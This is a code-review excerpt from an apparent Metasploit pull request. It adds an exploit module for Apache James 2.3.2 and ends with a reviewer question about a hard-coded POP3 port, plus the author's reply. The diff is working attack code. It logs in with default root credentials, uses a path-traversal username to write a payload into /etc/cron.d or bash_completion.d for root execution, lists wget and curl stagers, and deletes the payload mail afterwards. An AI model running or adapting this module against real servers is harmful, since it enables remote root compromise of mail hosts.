modules/exploits/linux/smtp/apache_james_exec.rb

```diff
@@ -0,0 +1,187 @@
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Bash Completion', {
+          'ExploitPath' => 'bash_completion.d',
+          'ExploitPrepend' => '' } ],
+        [ 'Cron', {
+          'ExploitPath' => 'cron.d',
+          'ExploitPrepend' => '* * * * * root ' } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 1,
+      'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
+          Opt::RPORT(25)
+        ])
+  end
+
+  def check
+    # SMTP service check
+    connect
+    smtp_banner = sock.get_once
+    disconnect
+    unless smtp_banner.to_s.include? "JAMES SMTP Server"
+      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
+    end
+
+    # James Remote Administration Tool service check
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
+    admin_banner = sock.get_once
+    disconnect
+    unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
+      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
+    end
+
+    # Get version number
+    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
+    # Null check
+    unless version
+      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
+    end
+    # Create version objects
+    target_version = Gem::Version.new(version)
+    vulnerable_version = Gem::Version.new("2.3.2")
+
+    # Check version number
+    if target_version > vulnerable_version
+      return CheckCode::Safe
+    elsif target_version == vulnerable_version
+      return CheckCode::Appears
+    elsif target_version < vulnerable_version
+      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
+    end
+  end
+
+  def execute_james_admin_tool_command(cmd)
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
+    sock.get_once
+    sock.puts(username + "\n")
+    sock.get_once
+    sock.puts(password + "\n")
+    sock.get_once
+    sock.puts(cmd)
+    sock.get_once
+    sock.puts("quit\n")
+    disconnect
+  end
+
+  def cron_cleanup()
+    # Delete mail objects containing payload from cron.d
+    username = "../../../../../../../../etc/cron.d"
+    password = "exploit"
+    begin
+      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
```

Comment:
What's `'RPORT' => "110"` in this context? Should it be user-configurable?

Reply:
This is the POP3 service for Apache James.  This is used to log in as the malicious user and delete the mail objects that store the payload on cleanup.  I added it to the user configurable options and updated the documentation.